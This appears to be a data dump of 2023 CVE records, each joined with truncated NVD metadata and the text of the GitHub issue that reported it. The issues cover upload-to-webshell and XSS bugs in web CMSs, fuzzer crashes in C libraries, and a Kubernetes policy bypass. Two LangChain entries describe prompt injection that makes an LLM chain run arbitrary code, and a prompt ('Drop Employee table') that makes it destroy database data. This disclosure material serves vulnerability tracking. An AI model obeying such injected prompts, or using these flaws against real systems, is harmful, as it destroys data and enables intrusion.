Vulnerability Product:funadmin Vulnerability version:.3.3.2 - 3.3.3 Vulnerability type:Insecure file upload Vulnerability Details: Vulnerability location app\backend\controller\Addon.php#localinstall method the method:localinstall doesn't check any webshell or sensitive function in file, which may cause insecure...
Insecure file upload via plugins install in funadmin v3.3.2 - v3.3.3
https://api.github.com/repos/funadmin/funadmin/issues/17/comments
1
2023-06-08T08:35:34Z
2023-06-13T04:35:27Z
https://github.com/funadmin/funadmin/issues/17
1,747,377,647
17
CVE-2023-36239
2023-06-22T19:15:09.037
libming listswf 0.4.7 was discovered to contain a buffer overflow in the parseSWF_DEFINEFONTINFO() function at parser.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/273" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Pa...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:libming:0.4.7:*:*:*:*:*:*:*", "matchCriteriaId": "18B4A4AA-DE48-45A4-AE25-1C83C1CDC743", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "120" ]
120
https://github.com/libming/libming/issues/273
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
# Allocation size overflow in parseSWF_DEFINEFONTINFO() at parser.c:1948 Allocation size overflow in the listswf at function parseSWF_DEFINEFONTINFO in parser.c:1948. ## Environment Ubuntu 18.04, 64 bit libming 0.4.7 ## Steps to reproduce 1. download file ``` git clone https://github.com/libming/libming.g...
Allocation size overflow in parseSWF_DEFINEFONTINFO() at parser.c:1948
https://api.github.com/repos/libming/libming/issues/273/comments
0
2023-06-13T07:08:07Z
2023-06-13T07:08:07Z
https://github.com/libming/libming/issues/273
1,754,192,903
273
CVE-2023-36271
2023-06-23T15:15:10.027
LibreDWG v0.12.5 was discovered to contain a heap buffer overflow via the function bit_wcs2nlen at bits.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/681#BUG2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "T...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.12.5:*:*:*:*:*:*:*", "matchCriteriaId": "8B002438-509E-462D-B17E-129197C3E4B3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "787" ]
787
https://github.com/LibreDWG/libredwg/issues/681#BUG2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hello, I was testing my fuzzer and found two bugs in dwg2SVG. ## environment ubuntu 20.04, GCC 9.4.0, libredwg latest commit 9df4ec3c524795a401acf371c8a953f5b1a6fadf compile with ``` ./autogen.sh && ./configure --disable-shared && make -j$(nproc) ``` ##BUG1 ``` ./dwg2SVG ../pocs/poc0.bit_utf8_to_TU ==...
[FUZZ] two bugs in dwg2SVG
https://api.github.com/repos/LibreDWG/libredwg/issues/681/comments
3
2023-03-31T04:10:48Z
2023-03-31T13:37:12Z
https://github.com/LibreDWG/libredwg/issues/681
1,648,637,134
681
CVE-2023-36272
2023-06-23T15:15:10.103
LibreDWG v0.12.5 was discovered to contain a heap buffer overflow via the function bit_utf8_to_TU at bits.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/681#BUG1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "T...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.12.5:*:*:*:*:*:*:*", "matchCriteriaId": "8B002438-509E-462D-B17E-129197C3E4B3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "787" ]
787
https://github.com/LibreDWG/libredwg/issues/681#BUG1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hello, I was testing my fuzzer and found two bugs in dwg2SVG. ## environment ubuntu 20.04, GCC 9.4.0, libredwg latest commit 9df4ec3c524795a401acf371c8a953f5b1a6fadf compile with ``` ./autogen.sh && ./configure --disable-shared && make -j$(nproc) ``` ##BUG1 ``` ./dwg2SVG ../pocs/poc0.bit_utf8_to_TU ==...
[FUZZ] two bugs in dwg2SVG
https://api.github.com/repos/LibreDWG/libredwg/issues/681/comments
3
2023-03-31T04:10:48Z
2023-03-31T13:37:12Z
https://github.com/LibreDWG/libredwg/issues/681
1,648,637,134
681
CVE-2023-36273
2023-06-23T15:15:10.160
LibreDWG v0.12.5 was discovered to contain a heap buffer overflow via the function bit_calc_CRC at bits.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/677#BUG1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "T...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.12.5:*:*:*:*:*:*:*", "matchCriteriaId": "8B002438-509E-462D-B17E-129197C3E4B3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "787" ]
787
https://github.com/LibreDWG/libredwg/issues/677#BUG1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hello, I was testing my fuzzer and found two bugs in dwg2dxf, which is different from #368 and #484 ## environment ubuntu 20.04, GCC 9.4.0, libredwg latest commit 77a85621de6e2c7ea44bc48c02e52dac97778ecb compile with ``` ./autogen.sh && ./configure --disable-shared && make -j$(nproc) ``` ## BUG1 ``` /li...
[FUZZ] two bugs in dwg2dxf
https://api.github.com/repos/LibreDWG/libredwg/issues/677/comments
2
2023-03-30T04:10:56Z
2023-04-04T14:03:23Z
https://github.com/LibreDWG/libredwg/issues/677
1,646,878,719
677
CVE-2023-36274
2023-06-23T15:15:10.213
LibreDWG v0.12.5 was discovered to contain a heap buffer overflow via the function bit_write_TF at bits.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/677#BUG2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "T...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.12.5:*:*:*:*:*:*:*", "matchCriteriaId": "8B002438-509E-462D-B17E-129197C3E4B3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "787" ]
787
https://github.com/LibreDWG/libredwg/issues/677#BUG2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hello, I was testing my fuzzer and found two bugs in dwg2dxf, which is different from #368 and #484 ## environment ubuntu 20.04, GCC 9.4.0, libredwg latest commit 77a85621de6e2c7ea44bc48c02e52dac97778ecb compile with ``` ./autogen.sh && ./configure --disable-shared && make -j$(nproc) ``` ## BUG1 ``` /li...
[FUZZ] two bugs in dwg2dxf
https://api.github.com/repos/LibreDWG/libredwg/issues/677/comments
2
2023-03-30T04:10:56Z
2023-04-04T14:03:23Z
https://github.com/LibreDWG/libredwg/issues/677
1,646,878,719
677
CVE-2023-36632
2023-06-25T18:15:09.313
The legacy email.utils.parseaddr function in Python through 3.11.4 allows attackers to trigger "RecursionError: maximum recursion depth exceeded while calling a Python object" via a crafted argument. This argument is plausibly an untrusted value from an application's input data that was supposed to contain a name and a...
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://docs.python.org/3/library/email.html" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://docs.python.org/3/library/email.utils.html" }, { "source": "cve@mitre.org", "ta...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "matchCriteriaId": "FBFABA38-746A-451D-A9DB-8AF31A4AE9B3", "versionEndExcluding": null, "versionEndIncluding": "3.11.4", "versionStartExcludin...
[ "674" ]
674
https://github.com/python/cpython/issues/103800
[ "Exploit", "Issue Tracking" ]
github.com
[ "python", "cpython" ]
# Bug report We did a fuzzing test on Python3.9.15, a recursion error happened. ```python from email.utils import * import email import email.utils import re class demoCls(): def __init__(self): pass def demoFunc(self, arg): try: ret = email.utils.parseaddr(arg)...
RecursionError in email.utils.parseaddr
https://api.github.com/repos/python/cpython/issues/103800/comments
2
2023-04-24T21:53:40Z
2023-04-25T17:55:49Z
https://github.com/python/cpython/issues/103800
1,682,097,315
103,800
CVE-2023-33661
2023-06-29T00:15:09.567
Multiple cross-site scripting (XSS) vulnerabilities were discovered in Church CRM v4.5.3 in GroupReports.php via GroupRole, ReportModel, and OnlyCart parameters.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/ChurchCRM/CRM/issues/6474" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/ChurchCRM...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:*", "matchCriteriaId": "C5A21E4C-1CE8-4C97-9374-DD8EBDB942D5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartEx...
[ "79" ]
79
https://github.com/ChurchCRM/CRM/issues/6474
[ "Exploit", "Issue Tracking" ]
github.com
[ "ChurchCRM", "CRM" ]
**If you have the ChurchCRM software running, please file an issue using the _Report an issue_ in the help menu.** #### On what page in the application did you find this issue? /churchcrm/GroupReports.php #### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows? Linux #### What ...
XSS exists in the group report page
https://api.github.com/repos/ChurchCRM/CRM/issues/6474/comments
2
2023-04-21T19:07:58Z
2023-11-05T01:05:42Z
https://github.com/ChurchCRM/CRM/issues/6474
1,678,971,305
6,474
CVE-2020-22151
2023-07-03T21:15:09.240
Permissions vulnerability in Fuel-CMS v.1.4.6 allows a remote attacker to execute arbitrary code via a crafted zip file to the assests parameter of the upload function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/daylightstudio/FUEL-CMS/issues/551" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendo...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.6:*:*:*:*:*:*:*", "matchCriteriaId": "F67321E5-38B6-455B-8BD2-B8C71878FC72", "versionEndExcluding": null, "versionEndIncluding": null, "version...
[ "434" ]
434
https://github.com/daylightstudio/FUEL-CMS/issues/551
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "daylightstudio", "FUEL-CMS" ]
1. First create a php file that executes the command and compress the php file into a zip <img width="606" alt="1" src="https://user-images.githubusercontent.com/9522862/74303980-98127100-4d96-11ea-9b59-101e6d44d889.png"> <img width="320" alt="2" src="https://user-images.githubusercontent.com/9522862/74304008-b11b22...
getshell in assets
https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/551/comments
1
2020-02-12T04:56:19Z
2020-09-30T20:49:24Z
https://github.com/daylightstudio/FUEL-CMS/issues/551
563,752,895
551
CVE-2020-22152
2023-07-03T21:15:09.293
Cross Site Scripting vulnerability in daylight studio FUEL- CMS v.1.4.6 allows a remote attacker to execute arbitrary code via the page title, meta description and meta keywords of the pages function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/daylightstudio/FUEL-CMS/issues/552" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendo...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.6:*:*:*:*:*:*:*", "matchCriteriaId": "F67321E5-38B6-455B-8BD2-B8C71878FC72", "versionEndExcluding": null, "versionEndIncluding": null, "version...
[ "79" ]
79
https://github.com/daylightstudio/FUEL-CMS/issues/552
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "daylightstudio", "FUEL-CMS" ]
Stored xss in Page title, Meta description, Meta keywords of pages <img width="1140" alt="xss1" src="https://user-images.githubusercontent.com/9522862/74311085-9a31fb00-4da9-11ea-84a0-b65eb76ba02b.png"> <img width="1146" alt="xss2" src="https://user-images.githubusercontent.com/9522862/74311126-aae27100-4da9-11ea-9f8...
XSS in pages
https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/552/comments
0
2020-02-12T07:10:34Z
2021-04-15T18:33:49Z
https://github.com/daylightstudio/FUEL-CMS/issues/552
563,798,483
552
CVE-2020-22153
2023-07-03T21:15:09.340
File Upload vulnerability in FUEL-CMS v.1.4.6 allows a remote attacker to execute arbitrary code via a crafted .php file to the upload parameter in the navigation function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/daylightstudio/FUEL-CMS/issues/553" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendo...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.6:*:*:*:*:*:*:*", "matchCriteriaId": "F67321E5-38B6-455B-8BD2-B8C71878FC72", "versionEndExcluding": null, "versionEndIncluding": null, "version...
[ "434" ]
434
https://github.com/daylightstudio/FUEL-CMS/issues/553
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "daylightstudio", "FUEL-CMS" ]
<img width="837" alt="c1" src="https://user-images.githubusercontent.com/9522862/74326653-bc397680-4dc5-11ea-9e41-c24b32bf4bad.png"> upload function: <img width="1006" alt="c2" src="https://user-images.githubusercontent.com/9522862/74326673-c3608480-4dc5-11ea-89d8-9246baff623c.png"> $This-> fuel-> navigation-> u...
Code execution in navigation/upload
https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/553/comments
0
2020-02-12T10:44:49Z
2020-09-30T21:04:55Z
https://github.com/daylightstudio/FUEL-CMS/issues/553
563,911,041
553
CVE-2023-2727
2023-07-03T21:15:09.480
Users may be able to launch containers using images that are restricted by ImagePolicyWebhook when using ephemeral containers. Kubernetes clusters are only affected if the ImagePolicyWebhook admission plugin is used together with ephemeral containers.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "inte...
[ { "source": "jordan@liggitt.net", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2023/07/06/2" }, { "source": "jordan@liggitt.net", "tags": [ "Issue Tracking" ], "url": "https://github.com/kubernetes/kubern...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "44D47082-4E70-4CBE-B52B-B2A83903F17B", "versionEndExcluding": null, "versionEndIncluding": "1.24.14", "versionStar...
[ "20" ]
20
https://github.com/kubernetes/kubernetes/issues/118640
[ "Issue Tracking" ]
github.com
[ "kubernetes", "kubernetes" ]
### CVE-2023-2727: Bypassing policies imposed by the ImagePolicyWebhook admission plugin CVSS Rating: [CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N) A security issue was discovered in Kubernetes where users may be able to launch...
CVE-2023-2727, CVE-2023-2728: Bypassing policies imposed by the ImagePolicyWebhook and bypassing mountable secrets policy imposed by the ServiceAccount admission plugin
https://api.github.com/repos/kubernetes/kubernetes/issues/118640/comments
10
2023-06-13T14:42:06Z
2024-07-01T15:57:09Z
https://github.com/kubernetes/kubernetes/issues/118640
1,755,056,681
118,640
CVE-2023-36258
2023-07-03T21:15:09.797
An issue in LangChain before 0.0.236 allows an attacker to execute arbitrary code because Python code with os.system, exec, or eval can be used.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Mitigation" ], "url": "https://github.com/hwchase17/langchain/issues/5872" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Mitigation" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:langchain:langchain:0.0.199:*:*:*:*:*:*:*", "matchCriteriaId": "99FB5025-85A6-41B6-B0DC-7D34C5FCFB6A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStart...
[ "94" ]
94
https://github.com/hwchase17/langchain/issues/5872
[ "Exploit", "Issue Tracking", "Mitigation" ]
github.com
[ "hwchase17", "langchain" ]
### System Info langchain version: `0.0.194` os: `ubuntu 20.04` python: `3.9.13` ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Promp...
Prompt injection which leads to arbitrary code execution in `langchain.chains.PALChain`
https://api.github.com/repos/langchain-ai/langchain/issues/5872/comments
5
2023-06-08T08:45:37Z
2023-08-29T16:31:34Z
https://github.com/langchain-ai/langchain/issues/5872
1,747,393,600
5,872
CVE-2023-36189
2023-07-06T14:15:10.707
SQL injection vulnerability in langchain before v0.0.247 allows a remote attacker to obtain sensitive information via the SQLDatabaseChain component.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": null, "url": "https://gist.github.com/rharang/9c58d39db8c01db5b7c888e467c0533f" }, { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/hwchase17/langchain/issues/5923" }, { "source": "cve@mitre.org", "t...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:langchain:langchain:0.0.64:*:*:*:*:*:*:*", "matchCriteriaId": "0D9CEC27-1B1B-4365-82F1-2538DD3F158D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartE...
[ "89" ]
89
https://github.com/hwchase17/langchain/issues/5923
[ "Exploit" ]
github.com
[ "hwchase17", "langchain" ]
### System Info There is no safeguard in SQLDatabaseChain to prevent a malicious user from sending a prompt such as "Drop Employee table". SQLDatabaseChain should have a facility to intercept and review the SQL before sending it to the database. Creating this separately from https://github.com/hwchase17/langch...
SQLDatabaseChain has SQL injection issue
https://api.github.com/repos/langchain-ai/langchain/issues/5923/comments
7
2023-06-09T07:19:24Z
2024-03-13T16:12:29Z
https://github.com/langchain-ai/langchain/issues/5923
1,749,279,355
5,923
CVE-2023-37132
2023-07-06T15:15:16.253
A stored cross-site scripting (XSS) vulnerability in the custom variables module of eyoucms v1.6.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/45" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/weng-...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.3:*:*:*:*:*:*:*", "matchCriteriaId": "0DDC6EF0-7D79-4155-B984-0BA7756C05EC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "79" ]
79
https://github.com/weng-xianhu/eyoucms/issues/45
[ "Exploit", "Issue Tracking" ]
github.com
[ "weng-xianhu", "eyoucms" ]
123
123
https://api.github.com/repos/weng-xianhu/eyoucms/issues/45/comments
0
2023-06-27T03:33:35Z
2024-03-22T06:49:26Z
https://github.com/weng-xianhu/eyoucms/issues/45
1,776,028,889
45